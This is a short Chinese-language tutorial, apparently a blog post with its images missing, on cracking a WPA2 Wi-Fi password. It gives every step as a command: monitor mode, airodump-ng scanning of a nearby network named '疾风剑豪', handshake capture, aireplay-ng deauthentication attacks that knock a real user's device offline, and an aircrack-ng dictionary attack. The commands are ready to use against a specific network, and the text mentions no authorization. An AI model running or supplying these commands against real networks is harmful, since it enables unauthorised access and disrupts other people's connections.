iwconfig查看网卡

 

 

 启动监听模式，设置信道

 ifconfig wlan0 down
 iwconfig wlan0 mode Monitor
 ifconfig wlan0 up
 iwconfig wlan0 channel 10

 

 

 airodump-ng wlan0扫描周边热点

找疾风剑豪这个

 

 

 

 得到MAC地址

2E:15:E1:28:56:08

 

准备抓握手包（需要有人连上了目标wifi，把他踢下线，在他重新连接的时候进行抓包操作）

airodump-ng -c 3 --bssid 2E:15:E1:28:56:08 -w /root/WPA2/yasuo wlan0
airodump-ng -c 3(信道) --bssid 2E:15:E1:28:56:08(目标wifiMAC地址) -w /root/WPA2/527(握手包保存地址) wlan0(工作的网卡)

注意，-c参数不能丢，不然后续踢人下线的时候，会出现这个问题

 

 

 

等待一段时间，下面表示有5个人练了这个wifi

 

 

 

 找一个幸运儿，踢他下线

aireplay-ng -0 5 -a 2E:15:E1:28:56:08 -c 28:3A:4D:0B:6C:91  wlan0
aireplay-ng -0 5(发送断开连接包的数量) -a 2E:15:E1:28:56:08(wifi的MAC地址) -c 28:3A:4D:0B:6C:91(幸运儿的设备MAC地址)  wlan0(工作网卡)

 

 

 

 一般来说断开一两次就可以抓到包，偶尔脸黑抓不到，就换一个人踢，

抓到包后，在airdump-ng这里可以看到

 

 

然后就是爆破了

aircrack-ng -w /root/wifi_password_dir/xato-net-10-million-passwords.txt yasuo-02.cap
aircrack-ng -w 字典位置 握手包位置